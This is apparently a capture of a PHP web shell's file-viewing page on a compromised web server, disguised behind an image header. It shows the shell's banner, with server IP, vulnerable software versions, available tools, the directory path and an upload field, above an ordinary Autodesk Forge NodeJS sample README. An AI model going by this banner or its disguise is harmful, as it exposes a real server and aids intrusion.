????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.191.73.161 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/forge/forge-api-nodejs-client/samples/ |
Upload File : |
# Forge NodeJS Sample App ## Overview This sample app uses the Forge NodeJS SDK to introduce the [OAuth](https://developer.autodesk.com/en/docs/oauth/v2/overview/) and [Data Management](https://developer.autodesk.com/en/docs/data/v2/overview/) Forge APIs. It shows the following workflow: * Create a 2-legged authentication token * Create a bucket (an arbitrary space to store objects) * Upload a file to the bucket * Get a list of buckets * Delete the file ### Requirements * Node.js version 4 and above. ### Installation ```bash $ git clone https://github.com/Autodesk-Forge/forge-api-nodejs-client.git $ cd forge-api-nodejs-client $ npm install ``` ### Create an App [Create an app](https://developer.autodesk.com/en/docs/oauth/v2/tutorials/create-app/) on the Forge Developer portal, and ensure that you select the Data Management API. Note the client ID and client secret. ### Configure the Parameters Before running the app you need to configure the following parameters from the *samples/dmSample.js* file: * Replace `FORGE_CLIENT_ID` and `FORGE_CLIENT_SECRET` with the client ID and client secret generated when creating the app. * Replace `BUCKET_KEY` with a unique name for the bucket. * Select a file, and replace `FILE_NAME` and `FILE_PATH` with the filename and file path. ### Run the App ```bash $ cd samples/ $ node dmSample.js ``` ## Support forge.help@autodesk.com